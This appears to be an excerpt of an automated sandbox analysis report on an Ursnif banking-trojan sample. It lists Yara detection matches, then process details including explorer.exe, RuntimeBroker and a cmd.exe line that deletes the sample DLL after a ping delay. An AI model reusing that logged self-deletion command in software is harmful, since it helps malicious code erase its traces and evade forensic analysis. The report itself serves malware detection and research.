Yara matches:	Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000018.00000000.396215708.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000018.00000003.396816648.000001E5EFD1C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000018.00000003.396935165.000001E5EFD1C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000018.00000000.394439164.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000018.00000000.395073730.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security

Target ID:	26
Start time:	10:36:30
Start date:	28/04/2022
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff6b8cf0000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Target ID:	31
Start time:	10:36:49
Start date:	28/04/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\3r0Cgcbr8c.dll
Imagebase:	0x7ff7fa2e0000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Target ID:	32
Start time:	10:36:51
Start date:	28/04/2022
Path:	C:\Windows\System32\RuntimeBroker.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\RuntimeBroker.exe -Embedding
Imagebase:	0x7ff7540f0000
File size:	99272 bytes
MD5 hash:	C7E36B4A5D9E6AC600DD7A0E0D52DAC5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Target ID:	33
Start time:	10:37:12
Start date:	28/04/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language